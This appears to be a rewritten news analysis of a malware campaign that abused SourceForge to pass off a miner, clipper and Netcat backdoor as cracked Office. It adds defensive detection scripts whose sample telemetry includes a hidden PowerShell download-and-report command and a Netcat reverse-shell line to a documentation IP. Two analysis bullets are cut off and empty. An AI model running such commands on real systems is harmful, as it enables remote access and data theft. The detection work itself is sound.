Cybercriminals Use SourceForge to Distribute Malware Disguised as Cracked Microsoft Office


A recent investigation by Kaspersky has unveiled a cyberattack campaign where hackers are abusing SourceForge, a legitimate software hosting platform, to deliver malicious software disguised as cracked versions of Microsoft Office. This tactic is part of a broader trend where attackers exploit trusted platforms and manipulate search results to spread malware to unsuspecting users.

This article breaks down the key points of the campaign, how it works, and the larger implications for cybersecurity in 2025.

Malware Campaign Summary

  • Threat actors are leveraging SourceForge to host fake Microsoft Office software packages.
  • One such project, named officepackage, appears to offer harmless Office add-ins but actually delivers malware.
  • The project page mimics a legitimate download site, using the SourceForge subdomain officepackage.sourceforge.io and deceptive download URLs.
  • Users who click the download button are redirected to taplink.cc, where they are served a ZIP file (vinstaller.zip).
  • That ZIP contains a password-protected archive and a text file revealing the password.
  • Inside the second archive is an MSI installer that deploys a Visual Basic script.
  • The script triggers a chain of PowerShell scripts, which:
      – download a batch file from GitHub;
      – extract the malicious files;
      – send system metadata to the attackers via the Telegram API.
  • The final payloads include:
      – a cryptocurrency miner;
      – clipper malware (ClipBanker), which replaces cryptocurrency wallet addresses copied to the clipboard with the attackers' own;
      – Netcat (renamed ShellExperienceHost.exe), giving the attackers an encrypted remote-access channel.
  • An additional script, ErrorHandler.cmd, fetches further code via Telegram and runs it.
  • The campaign primarily targets Russian-speaking users; roughly 90% of infections are in Russia.
  • Over 4,600 users encountered the campaign between January and March.
  • Attackers rely on search engines such as Yandex indexing the SourceForge pages, so that users searching for cracked Office downloads land on them.

Besides this campaign, Kaspersky also uncovered other attacks, including:

  • Malware hosted on fake DeepSeek AI chatbot websites.
  • Fake sites promoted via Google ads pushing a downloader named TookPS.
  • DLL sideloading tricks using TeamViewer (the TeviRat backdoor) to create stealthy remote-access backdoors.
  • A related malvertising campaign delivering ThunderShell (aka SMOKEDHAM), a PowerShell-based remote access tool.
  • ThunderShell is a post-exploitation framework used by red teams, but in this case it is abused by real attackers.
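The infection chain summarised above (MSI installer, VBScript, PowerShell reaching GitHub and the Telegram API, and a renamed Netcat) leaves a recognisable trail in process-creation telemetry. The following script is an added example, not code from the original article or from Kaspersky's report: it runs three hunting rules over Sysmon-style process records. The records, process names, paths, URLs and bot token are all constructed for illustration, and the exact process names in the real chain (for example whether the Visual Basic script runs under wscript.exe or cscript.exe) are assumptions.

```python
# Added example (not from the original article or Kaspersky's report): hunts for the
# installer chain described above in process-creation telemetry. All records, paths,
# URLs and tokens below are constructed for illustration.
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon event 1 style), constructed for this example."""
    pid: int
    ppid: int
    image: str      # full path of the started image
    cmdline: str


# Constructed sample telemetry: an MSI launches a VBScript via wscript, which launches
# PowerShell that pulls a batch file from GitHub and reports via Telegram; then a renamed
# Netcat posing as ShellExperienceHost.exe starts. pid 600 is the genuine Windows binary.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Users\alice\Downloads\installer.msi /qn"),
    ProcEvent(300, 200, r"C:\Windows\System32\wscript.exe",
              r"wscript.exe C:\Users\alice\AppData\Local\Temp\install.vbs"),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -ep bypass -c "iwr https://raw.githubusercontent.com/example/repo/main/stage2.bat; '
              'irm https://api.telegram.org/bot123456:CONSTRUCTED/sendMessage"'),
    ProcEvent(500, 400, r"C:\Users\alice\AppData\Roaming\ShellExperienceHost.exe",
              "ShellExperienceHost.exe -e cmd.exe 203.0.113.10 443"),
    ProcEvent(600, 1, r"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe",
              "ShellExperienceHost.exe"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
VBS_HOSTS = {"wscript.exe", "cscript.exe"}
WATCHED_HOSTS = ("api.telegram.org", "raw.githubusercontent.com")
# The genuine ShellExperienceHost.exe lives under C:\Windows\SystemApps\ShellExperienceHost_<id>\
SYSTEM_APPS_PREFIX = "c:\\windows\\systemapps\\"


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def ancestry(by_pid: dict, pid: int, max_depth: int = 6) -> list:
    """Image names from the process up to its oldest known ancestor."""
    chain = []
    event = by_pid.get(pid)
    while event is not None and len(chain) < max_depth:
        chain.append(image_name(event.image))
        event = by_pid.get(event.ppid)
    return chain


def detect(events) -> list:
    """Return one alert string per rule hit over the given process-creation records."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = image_name(e.image)
        parents = ancestry(by_pid, e.pid)[1:]
        # Rule 1: PowerShell whose ancestors include both a VBScript host and msiexec.
        if name in ("powershell.exe", "pwsh.exe") and "msiexec.exe" in parents and VBS_HOSTS & set(parents):
            alerts.append(f"pid {e.pid}: PowerShell launched via msiexec -> VBScript chain "
                          f"({' <- '.join([name] + parents)})")
        # Rule 2: a script host whose command line names Telegram or raw GitHub content.
        if name in SCRIPT_HOSTS:
            for host in WATCHED_HOSTS:
                if host in e.cmdline.lower():
                    alerts.append(f"pid {e.pid}: {name} command line references {host}")
        # Rule 3: a binary named like the Windows shell host running outside SystemApps.
        if name == "shellexperiencehost.exe" and not e.image.lower().startswith(SYSTEM_APPS_PREFIX):
            alerts.append(f"pid {e.pid}: ShellExperienceHost.exe running from {ntpath.dirname(e.image)} "
                          "(expected under C:\\Windows\\SystemApps)")
    return alerts


if __name__ == "__main__":
    for line in detect(SAMPLE_EVENTS):
        print(line)
```

Rule 3 is the cheapest of the three to run in production because it needs no parent lookup: a process whose image name matches a Windows system component but whose path is under a user profile is almost always masquerading. Rule 1 is the most specific to this campaign and the least likely to fire on benign software, since legitimate MSI installers rarely need a VBScript to launch PowerShell.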

What Undercode Says: Deep Analysis & Insights

This attack represents a convergence of social engineering, platform abuse, and code obfuscation, all executed with surprising finesse. Here’s how it breaks down from a threat research and cybersecurity operations perspective:

  • Abusing Trustworthy Platforms: SourceForge has long been a go-to destination for open-source software, and that trust is now weaponized. Unlike phishing emails or obviously shady download sites, the attackers here hide behind a legitimate brand and a sourceforge.io subdomain, which makes users far more likely to download and run the file.

  • Layered Obfuscation: The multi-stage process (ZIP inside ZIP, an MSI dropping a VB script, then PowerShell payloads) is a deliberate effort to evade antivirus and behavioral detection. The password-protected inner archive defeats automated scanning at mail gateways, download proxies and sandboxes, which cannot open it without the password that only the human reader gets from the accompanying text file.

  • Command-and-Control Evolution: Leveraging

  • Strategic Language Targeting: The focus on Russian-language content and the reliance on Yandex indexing show a precise regional targeting mechanism. This is not a scattershot phishing campaign; it is a tightly aimed operation.

  • Double-Dipping in Monetization: The inclusion of both a cryptominer and a clipper lets the attackers extract immediate financial value, while the Netcat backdoor (and, in the TookPS campaign, TeviRat) points to longer-term exploitation, such as reselling access or stolen data.

  • Sponsored Malvertising:

  • DLL Sideloading Abuse: This technique, especially when paired with a legitimate, signed tool like TeamViewer, gives stealthy remote access that is hard to detect and harder to remove once entrenched, because the process that is running is a trusted binary and only the library it loaded is malicious.

  • GitHub as a Payload Source: Hosting the malicious batch file and scripts on GitHub adds another trusted domain to the attack chain. This undermines network filtering, since GitHub traffic is often allow-listed and its downloads rarely inspected.

  • Cybercrime as a Service (CaaS): The sophistication suggests either a well-funded group or the use of plug-and-play malware kits sold on underground markets. Stitching clipper malware, a remote-access backdoor and a miner into one seamless install process is not amateur work.

  • Implications for Enterprise: Organizations relying on SourceForge or other open-source resources need to validate what they download rigorously: verify publisher signatures and hashes, and block "cracked" software outright. Supply chain attacks do not always come through developers; sometimes the danger lies in what employees download on their own.

  • Next-Gen Threat Detection: Behavioral monitoring and network-level anomaly detection are critical. Static or signature-based AV would likely miss this campaign, because the malicious behavior only appears when the scripts execute. Practical checks include alerting on msiexec spawning a script host that spawns PowerShell, on script hosts contacting api.telegram.org, and on binaries with Windows system names running from user-writable directories.

  • Telegram, GitHub, SourceForge, a deadly trio: Using legitimate infrastructure for hosting, payload delivery and command-and-control makes attribution difficult and takedown coordination slow, since each abuse report goes to a different provider.

  • What’s Next? Expect a rise in localized malware campaigns that mirror this structure. Language targeting, region-specific search results, and trust-abuse are proving more effective than traditional phishing.
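The "Layered Obfuscation" point above, that a password-protected inner archive defeats automated scanning, can be turned into a triage heuristic: an outer ZIP that carries a nested archive next to a small text file mentioning a password is worth quarantining before anyone opens it. The following is an added example, not code from the original article or from Kaspersky's report. The archive contents, member names (installer.zip, readme.txt, setup.msi) and the password string are constructed; because Python's zipfile module cannot write encrypted entries, the sample builder patches the encryption flag into the headers itself, which is a test-only trick and not something a real dropper needs to do.

```python
# Added example (not from the original article or Kaspersky's report): scores an outer ZIP
# for the "encrypted inner archive plus password note" packaging. All sample archive
# contents and names below are constructed.
import io
import zipfile

ARCHIVE_SUFFIXES = (".zip", ".rar", ".7z")
PASSWORD_HINTS = ("password", "passwd", "пароль")   # English and Russian
FLAG_ENCRYPTED = 0x1                                 # general-purpose bit 0 of a ZIP entry


def inspect_archive(zip_bytes: bytes) -> dict:
    """Score an outer ZIP for the dropper pattern: a nested archive (typically encrypted)
    next to a small text file that hands the user the password."""
    result = {"nested": [], "encrypted_nested": [], "password_notes": [], "score": 0}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            lower = info.filename.lower()
            if lower.endswith(ARCHIVE_SUFFIXES):
                result["nested"].append(info.filename)
                result["score"] += 1
                if info.flag_bits & FLAG_ENCRYPTED:      # cannot be scanned without the password
                    result["encrypted_nested"].append(info.filename)
                    result["score"] += 2
            elif lower.endswith(".txt") and info.file_size < 4096 and not info.flag_bits & FLAG_ENCRYPTED:
                text = zf.read(info).decode("utf-8", "replace").lower()
                if any(hint in text for hint in PASSWORD_HINTS):
                    result["password_notes"].append(info.filename)
                    result["score"] += 2
    # A nested archive plus a password note is already enough to hold the file for review.
    result["verdict"] = "quarantine" if result["score"] >= 3 else "pass"
    return result


def _mark_encrypted(zip_bytes: bytes, member: str) -> bytes:
    """Test helper only: zipfile cannot write encrypted entries, so set the encryption flag
    on `member`'s local and central-directory headers to imitate a password-protected entry."""
    data = bytearray(zip_bytes)
    wanted = member.encode()
    # (signature, flag offset, name-length offset, name offset) for local and central headers
    for sig, flag_off, len_off, name_off in ((b"PK\x03\x04", 6, 26, 30), (b"PK\x01\x02", 8, 28, 46)):
        pos = data.find(sig)
        while pos != -1:
            nlen = int.from_bytes(data[pos + len_off:pos + len_off + 2], "little")
            if data[pos + name_off:pos + name_off + nlen] == wanted:
                data[pos + flag_off] |= FLAG_ENCRYPTED
            pos = data.find(sig, pos + 4)
    return bytes(data)


def build_sample_dropper() -> bytes:
    """Constructed look-alike of the described ZIP: encrypted inner archive + password note."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("setup.msi", b"placeholder MSI bytes (constructed)")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("installer.zip", inner.getvalue())
        z.writestr("readme.txt", "Archive password: office2025\n")
    return _mark_encrypted(outer.getvalue(), "installer.zip")


def build_benign_sample() -> bytes:
    """Constructed ordinary download: a data file and a plain readme."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("data.csv", "id,value\n1,2\n")
        z.writestr("readme.txt", "Thanks for downloading. Open data.csv in a spreadsheet.\n")
    return buf.getvalue()


if __name__ == "__main__":
    print(inspect_archive(build_sample_dropper()))
    print(inspect_archive(build_benign_sample()))
```

The heuristic deliberately scores the password note on its own, because droppers sometimes put the password in the file name or on the download page instead of inside an encrypted entry; in a gateway you would also want to recurse into any nested archive that is not encrypted and rerun the same check one level down.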

Fact Checker Results:

  • ✅ SourceForge is confirmed as the initial malware host in this campaign.
  • ✅ Malware variants include cryptominers, clippers, and PowerShell-based RATs.
  • ✅ The campaign mainly targeted Russian users via Yandex-indexed pages.


References:

Reported By: thehackernews.com